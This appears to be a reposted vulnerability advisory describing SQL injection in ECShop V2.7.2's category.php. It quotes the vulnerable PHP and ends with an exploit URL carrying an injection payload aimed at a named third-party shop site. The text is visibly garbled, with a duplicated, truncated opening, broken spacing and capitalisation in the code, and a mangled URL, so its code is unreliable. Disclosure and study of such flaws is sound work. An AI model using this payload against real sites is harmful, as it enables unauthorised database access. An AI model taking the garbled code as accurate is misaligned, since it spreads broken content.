ECSHOP mall system does not strictly filter the category page and causes SQL Injection Vulnerabilities. Affected Versions: ECShopV2.7.2UTF8 _ Release0505 vulnerability analysis: file category. php $ filter_attr_strisset ($ _ REQUEST [filter_attr])? Trim ($ _ REQUEST [filter_attr]): 0; 52 rows $ filter_attrempty ($ f
ECSHOP mall SystemCatSQL injection vulnerability caused by poor egory page filtering
Affected Versions:
ECShop V2.7.2 UTF8_Release0505
Vulnerability Analysis: file category.Php
$ Filter_atTr_ Str = isSet($ _ REQUEST ['filter _ attr '])? Trim ($ _ REQUEST ['filter _ attr ']): '0'; // 52 rows
$ Filter_attr = empty ($ filter_attr_str )? '':ExPlode ('.', trim ($ filter_attr_str ));
The variable $ filter_attr_str is an array separated.
// 308 rows
/* Extended item query conditions */
If (! Empty ($ filter_attr ))
{
$ Ext_ SQL = "Select DISTINCT (B. goods _Id) FROM ". $ ecs-> table ('goods _ attr '). "AS ,". $ ecs-> table ('goods _ attr '). "AS B ". "Where ";
$ Ext_group_goods = array ();
Foreach ($ filter_attr AS $ k => $ v) // locate the product id that meets all the filter attributes */
{
If ($ v! = 0)
{
$ SQL = $ ext_ SQL. "B. attr_value = a. attr_value AND B. attr_id =". $ cat_filter_attr [$ k]. "AND a. goods_attr_id =". $ v;
$ Ext_group_goods = $ db-> getColCachEd($ SQL );
$ Ext. = 'and'. db_create_in ($ ext_group_goods, 'G. goods_id ');
}
}
}
$ V adds SQL queries without any processing, resulting in SQL injection.
Vulnerability exploitation:
Http://www.xiaoweio.cn/shop/category.php? Page = 1 & sort = goods_id & order = ASC % 23goods_list & category = 1 & display = grid & brand = 0 & price_min = 0 & price_max = 0 & filter_attr =-999 or 1 = 1 and exists (select * from admin)
From the red/Black Alliance